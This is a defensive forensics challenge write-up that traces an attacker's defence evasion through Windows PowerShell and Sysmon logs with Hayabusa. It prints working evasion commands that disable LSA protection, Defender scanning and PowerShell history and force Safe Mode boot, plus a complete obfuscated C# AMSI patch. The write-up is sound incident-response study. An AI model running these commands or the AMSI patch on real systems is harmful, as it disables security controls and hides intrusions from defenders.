operation blackout 2025: smoke & mirrors

	Released	2025-06-06
	Retired	2025-06-06
	Author	iamr007

Scenario

Byte Doctor Reyes is investigating a stealthy post-breach attack where several expected security logs and Windows Defender alerts appear to be missing. He suspects the attacker employed defense evasion techniques to disable or manipulate security controls, significantly complicating detection efforts. Using the exported event logs, your objective is to uncover how the attacker compromised the system’s defenses to remain undetected.

Task 01

Question: The attacker disabled LSA protection on the compromised host by modifying a registry key. What is the full path of that registry key?

Three .evtx files are available for analysis in this case, providing logging information related to PowerShell usage and a Sysmon Log based on an unknown configuration.

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
------         4/10/2025   8:43 AM        2166784 Microsoft-Windows-Powershell-Operational.evtx
------         4/10/2025   8:42 AM        1118208 Microsoft-Windows-Powershell.evtx
------         4/10/2025   8:44 AM        2166784 Microsoft-Windows-Sysmon-Operational.evtx

To gain a better overview, Hayabusa can be used to pre-filter and highlight important and relevant logs. After successful execution of hayabusa.exe json-timeline -U -d . -o hayabusa.json the resulting JSON timeline can be used to answer questions and gain an overview.

LSA protection is used to prevent credential dumping by protecting the LSASS process. On Windows 8.1 and later, added protection is provided to prevent nonprotected processes from reading memory and injecting code, called Protected Process Light. This can be deactivated by changing the corresponding registry entry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL to 0. Hayabusa does the heavy lifting for us here — there is a dedicated rule LSA PPL Protection Disabled Via Reg.EXE which triggered in this case and provides the corresponding Sysmon event along with a timestamp and the full command execution.

{
    "Timestamp": "2025-04-10 06:28:47.474 +00:00",
    "RuleTitle": "LSA PPL Protection Disabled Via Reg.EXE",
    "Level": "high",
    "Computer": "DESKTOP-M3AKJSD",
    "Channel": "Sysmon",
    "EventID": 1,
    "RecordID": 7807,
    "Details": {
        "Cmdline": "\"C:\\WINDOWS\\system32\\reg.exe\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v RunAsPPL /t REG_DWORD /d 0 /f\"",
        "Proc": "C:\\Windows\\SysWOW64\\reg.exe",
[...]

Answer: HKLM\SYSTEM\CurrentControlSet\Control\LSA

Task 02

Question: Which PowerShell command did the attacker first execute to disable Windows Defender?

There are many different ways to disable Windows Defender, and the attacker used several of them here. Thanks to PowerShell logging and the detailed Sysmon configuration, multiple Hayabusa rules were triggered that relate to the manipulation of Defender’s capabilities. The earliest timestamp of such a manipulation can be traced to 2025-04-10 06:31:32.867, which corresponds to a command logged in the EventLog under Event ID 4104.

{
    "Timestamp": "2025-04-10 06:31:32.867 +00:00",
    "RuleTitle": "Tamper Windows Defender - ScriptBlockLogging",
    "Level": "high",
    "Computer": "DESKTOP-M3AKJSD",
    "Channel": "PwSh",
    "EventID": 4104,
    "RecordID": 3466,
    "Details": {
        "ScriptBlock": "Set-MpPreference -DisableIOAVProtection $true -DisableEmailScanning $true -DisableBlockAtFirstSeen $true"
    },
    "ExtraFieldInfo": {
        "MessageNumber": 1,
        "MessageTotal": 1,
        "Path": "",
        "ScriptBlockId": "db55fc25-b6e7-4c04-bf27-37c1c540870a"
    },
    "RuleID": "6074ad34-a80f-fdd9-5c49-e1a2fc4572c4"
}

Answer: Set-MpPreference -DisableIOAVProtection $true -DisableEmailScanning $true -DisableBlockAtFirstSeen $true

Task 03

Question: The attacker loaded an AMSI patch written in PowerShell. Which function in the DLL is being patched by the script to effectively disable AMSI?

By reviewing the various entries flagged by Hayabusa under the Potentially Malicious PwSh rule, a script with relevant functionality was identified. It contains a function named Disable-Protection, which, upon successful execution, outputs Protection Disabled. The script performs the following actions:

Obtains a handle to the amsi.dll module (which is used by Windows Defender)
Locates the AmsiScanBuffer function
Removes write protection from the memory region
Overwrites the function’s start with 0x31, 0xC0, 0xC3, which corresponds to RET, effectively forcing the function to immediately return with success code.

using System;
using System.Runtime.InteropServices;

public class P { [DllImport("kernel32.dll")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32.dll")] public static extern IntPtr GetModuleHandle(string lpModuleName);
    [DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    public static bool Patch() { 
        IntPtr h = GetModuleHandle("a" + "m" + "s" + "i" + ".dll");
        if (h == IntPtr.Zero) return false;
        IntPtr a = GetProcAddress(h, "A" + "m" + "s" + "i" + "S" + "c" + "a" + "n" + "B" + "u" + "f" + "f" + "e" + "r");
        if (a == IntPtr.Zero) return false;
        UInt32 oldProtect;
        if (!VirtualProtect(a, (UIntPtr)5, 0x40, out oldProtect)) return false;
        byte[] patch = { 0x31, 0xC0, 0xC3 };
        Marshal.Copy(patch, 0, a, patch.Length);
        return VirtualProtect(a, (UIntPtr)5, oldProtect, out oldProtect);
    } 
}

Answer: AmsiScanBuffer

Task 04

Question: Which command did the attacker use to restart the machine in Safe Mode?

To check for additional executed commands, Event ID 4104 can again be used to review the recorded script blocks for relevant activity. During this analysis, the use of bcdedit can be observed - a tool used to modify Boot Configuration Data. A quick review of its command-line options via the Windows help function highlights that it can be used to set the system to boot into Safe Mode, specifically using the /set safeboot network option, which configures the system to start in Safe Mode with Networking.

bcdedit /? TYPES OSLOADER

WINDOWS OS LOADER

The following types can be used only for Windows OS Loader entries. For
information about data formats for these types, run "bcdedit /? FORMATS".

Boot
====
    BOOTLOG (bool)          Enables the system initialization log.
    BOOTSTATUSPOLICY        Can be DisplayAllFailures, IgnoreAllFailures,
                            IgnoreShutdownFailures, IgnoreBootFailures,
                            IgnoreCheckpointFailures, DisplayShutdownFailures,
                            DisplayBootFailures, or DisplayCheckpointFailures.
    LASTKNOWNGOOD (bool)    Enables boot to last known good configuration.
    NOCRASHAUTOREBOOT (bool)    Disables automatic restart on crash.
    RESUMEOBJECT (id)       Defines the identifier of the resume object that
                            is associated with this operating system object.
    SAFEBOOT                Can be Minimal, Network or DsRepair
    SAFEBOOTALTERNATESHELL (bool)   Uses the alternate shell when booted into
                                    Safe mode.
    SOS (bool)              Displays additional boot information.
    WINPE (bool)            Enables the computer to boot to Windows PE.

This exact command can be extracted from the PowerShell logs. Thanks to PowerShell Script Block Logging, the following line appears in the logs:

{
    "Timestamp": "2025-04-10 06:38:35.402 +00:00",
    "RuleTitle": "PwSh Scriptblock",
    "Level": "info",
    "Computer": "DESKTOP-M3AKJSD",
    "Channel": "PwSh",
    "EventID": 4104,
    "RecordID": 3787,
    "Details": {
        "ScriptBlock": "bcdedit /set safeboot network"
    },
    "ExtraFieldInfo": {
        "MessageNumber": 1,
        "MessageTotal": 1,
        "Path": "",
        "ScriptBlockId": "4424e2da-5302-4ba7-9280-a7b70b33e0aa"
    },
    "RuleID": "0f3b1343-65a5-4879-b512-9d61b0e4e3ba"
}

The expected answer for the challenge requires the full filename, as it appears in the Sysmon event logs for EventID 1.

{
    "Timestamp": "2025-04-10 06:38:35.440 +00:00",
    "RuleTitle": "Proc Exec",
    "Level": "info",
    "Computer": "DESKTOP-M3AKJSD",
    "Channel": "Sysmon",
    "EventID": 1,
    "RecordID": 7899,
    "Details": {
        "Cmdline": "\"C:\\WINDOWS\\system32\\bcdedit.exe\" /set safeboot network\"",
        "Proc": "C:\\Windows\\System32\\bcdedit.exe",
[...]

Answer: bcdedit.exe /set safeboot network

Task 05

Question: Which PowerShell command did the attacker use to disable PowerShell command history logging?

Hayabusa is helpful here as well by applying its default detection rules. The rule Clear PowerShell History - PowerShell triggers successfully based on another PowerShell Event ID 4104 entry at 2025-04-10 06:38:43.

{
    "Timestamp": "2025-04-10 06:38:43.549 +00:00",
    "RuleTitle": "Clear PowerShell History - PowerShell",
    "Level": "med",
    "Computer": "DESKTOP-M3AKJSD",
    "Channel": "PwSh",
    "EventID": 4104,
    "RecordID": 3802,
    "Details": {
        "ScriptBlock": "Set-PSReadlineOption -HistorySaveStyle SaveNothing"
    },
    "ExtraFieldInfo": {
        "MessageNumber": 1,
        "MessageTotal": 1,
        "Path": "",
        "ScriptBlockId": "eef9a7e3-fc56-47f7-b44f-2b4e1681d0bc"
    },
    "RuleID": "36e3fc18-c21d-b046-86b0-9f14ccbb975e"
}

Answer: Set-PSReadlineOption -HistorySaveStyle SaveNothing